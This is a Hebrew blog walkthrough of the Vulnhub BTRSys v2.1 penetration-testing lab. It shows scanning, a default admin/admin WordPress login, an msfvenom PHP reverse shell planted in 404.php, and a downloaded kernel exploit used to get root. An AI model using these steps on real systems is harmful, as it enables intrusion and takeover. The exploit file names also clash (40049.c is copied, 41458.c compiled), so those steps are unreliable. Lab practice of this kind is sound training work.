Home אבטחת מידעPenetration Testing - Offense ביצוע מעבדה Vulnhub BTRSys: v2.1

ביצוע מעבדה Vulnhub BTRSys: v2.1

0 comment
נהנתם מהמאמר ? שתפו אותו!

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

במדריך זה נעבור על מכונה לביצוע Pentest בשם BTRSys: v2.1

את ההורדה של המכונה יש להוריד מהקישור הבא
יש לטעון את המכונה ע"י vMware Workstation
המכונה מקבלת DHCP מכרטיס הרשת החיצוני שלכם.

דרישות

  • Kali
  • BTRSys: v2.1

כעת כשהמכונות דלוקות, נכנס לKali ונקיש את הפקודה

Netdiscover יבצע סריקה של רשת 192.168.31.0 על מנת לאתר מכונות שרצות

חסר מאפיין alt לתמונה הזו; שם הקובץ הוא 1-2.jpg

נמצא כי כתובת המחשב היא 192.168.31.56 ולכן נבצע סריקת Nmap

נוכל להבחין שיש שירות Http בפורט 80, נבצע סריקה בNikto

נבחין שיש קובץ Robots.txt, בקובץ זה לרוב בעלי אתרים רושמים איזה תיקיות או קבצים גוגל לא יסרוק

נכנס לאתר ונגיע לקובץ ה Robots.txt

נבחין שיש תיקייה בשם WordPress, מצויין נכנס לאתר

וננסה לגשת לפאנל הניהול, אם יצא לכם להתקין וורדפרס ואם לא אז זה חשוב לבצע תרגול שכזה

ננסה להיכנס לפאנל Admin, בקישור

http://192.168.31.56/wordpress/wp-admin

ננסה את המשתמש admin admin או כל סיסמא קלה, אם לא הצלחתם השתמשו ב wpscan על מנת לבצע Brute Force

בגלל שמעבדה זו קלה, ננסה admin admin והופ אנחנו בפנים

ננסה לעלות Plugin שהוא למעשה יצור לנו Reverse Shell, נוריד אותו מהאתר

בפאנל הניהול של המשתמש ננסה להעלות את הפלאגין

קיבלנו שגיאה וזה מצויין, הסיבה שאני מציג את זה למרות שלא נוכל להשתמש בטכניקה זו, היא שאתם תוכלו תמיד לחשוב על טכניקות חדשות שבהן ננסה "לפרוץ" את השרת

אם כך ננסה שיטה אחרת שבה נעלה קובץ PHP "זדוני" שיתן לנו גישת PHP Meterpreter

תחילה נכנס לAppearance ואז ל Edior ונערוך את קובץ 404

כעת ניצור קובץ PHP כזה, נקיש את הפקודה

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.132 lport=1234 -f raw

כמובן שאת כתובת ה IP יש לשנות לכתובת של הקאלי שלכם

וכעת את הקוד PHP שהוא יצר נעתיק

נדביק ב404.php

כעת נפתח

msfconsole

ונקיש את הפקודות הבאות על מנת ליצור Handler שיאזין ב Reverse Shell

כעת נפעיל את הקובץ הזדוני שהכנו ב404.php

נכנס לכתובת

192.168.31.56/wordpress/wp-content/themes/twentyfourteen/404.php

כעת תפתח גישה, נבדוק מה גירסת המערכת, נוכל גם להשתמש ב LinEnum בשביל לבדוק אם יש חולשות נוספות

זה נראה כמו גרסה בעייתית, נבדוק אם יש Exploit ידוע, נרשום בגוגל

linux kernel 4.4.0 exploit ubuntu

והראשון הוא הExploit הבא

נבדוק אם ה Exploit קיים אצלנו במאגר של Metasploit

searchploit Linux | grep -i ubuntu | grep 4.4.0

נבחין בשורה השלישית

נקיש את הפקודות הבאות

locate 41458.c

 

cp /usr/share/exploitdb/exploits/linux_x86-64/local/40049.c /var/www/html
כעת נבצע Compile
cd /var/www/html

 

gcc -o 41458Exploit 41458.c

נחזור כעת לMetasploit ונקיש

shell

כעת נבצע הורדה של "ה Exploit"

כמובן שכתובת האתר היא של הקאלי, שם ה Exoloit נמצא

wget http://192.168.31.132/41458Exploit

נקיש

chmod 777 41458Exploit
ועל מנת להפעיל את ה Exploit
./41458Exploit

אתם תקבלו שגיאה, כמו בתמונה

אבל זה לא אומר שזה לא עבד! השגנו Root

מאמרים קשורים

Leave a Comment